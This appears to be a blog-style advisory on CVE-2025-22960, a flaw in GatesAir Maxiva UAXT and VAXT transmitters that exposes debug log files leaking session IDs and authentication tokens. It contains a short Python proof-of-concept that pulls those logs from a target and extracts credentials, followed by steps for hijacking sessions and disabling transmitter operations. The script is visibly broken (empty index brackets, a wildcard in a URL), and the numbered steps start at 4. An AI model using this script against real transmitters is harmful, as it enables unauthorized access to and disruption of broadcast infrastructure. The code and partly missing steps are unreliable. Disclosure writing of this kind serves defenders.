CVE-2025-22960 - Session Hijacking Vulnerability in GatesAir Maxiva UAXT and VAXT Transmitters

GatesAir Maxiva UAXT and VAXT transmitters are widely used in the broadcasting industry for their high reliability and performance. However, a recently discovered critical security vulnerability, CVE-2025-22960, exposes these devices to potential session hijacking attacks. This post will detail the vulnerability, include code snippets, and provide links to original references for further reading.

Vulnerability Details

The vulnerability exists in the web-based management interface of GatesAir Maxiva UAXT and VAXT transmitters. An unauthenticated attacker can access exposed log files (located at /logs/debug/xteLog*). These log files may reveal sensitive session-related information such as session identifiers (sess_id) and authentication success tokens (user_check_password OK). By exploiting this flaw, attackers can hijack active sessions, gain unauthorized access to the management interface, and escalate privileges on the affected devices.

Here is a code snippet illustrating how an attacker might exploit this vulnerability

#!/usr/bin/python3

import requests

target_url = "http://target_IP_address/logs/debug/xteLog*";
response = requests.get(target_url)

if response.status_code == 200:
    log_data = response.text
    if 'sess_id' in log_data:
        session_id = log_data.split('sess_id')[1].split(' ')[]
        print("Session ID: ", session_id)
    if 'user_check_password OK' in log_data:
        auth_token = log_data.split('user_check_password OK')[1].split(' ')[]
        print("Authentication Token: ", auth_token)
else:
    print("Failed to access the log file.")

If successful, the script will display the session ID and authentication token.

4. Using these details, an attacker can hijack an active session by sending requests to the management interface with the stolen session ID and authentication token.
5. Once unauthorized access is achieved, an attacker can perform a variety of actions, such as changing device configurations or disabling transmitter operations.

Mitigation

To protect against this vulnerability, it is essential to apply any available firmware updates and security patches promptly. Additionally, implementing strict access controls, network segmentation, and firewall rules can help reduce the attack surface.

Here are some relevant links for more information

1. GatesAir Maxiva UAXT Product Page
2. GatesAir Maxiva VAXT Product Page
3. CVE-2025-22960 on NIST NVD

Conclusion

The CVE-2025-22960 vulnerability poses a significant risk to users of GatesAir Maxiva UAXT and VAXT transmitters. Attackers can exploit this flaw to hijack active sessions and gain unauthorized access to the management interface, potentially disrupting broadcasting operations. Ensuring devices have the latest firmware updates and adhering to best security practices can help prevent exploitation and minimize impact.

Timeline

Published on: 02/13/2025 23:15:10 UTC
Last modified on: 03/17/2025 19:15:25 UTC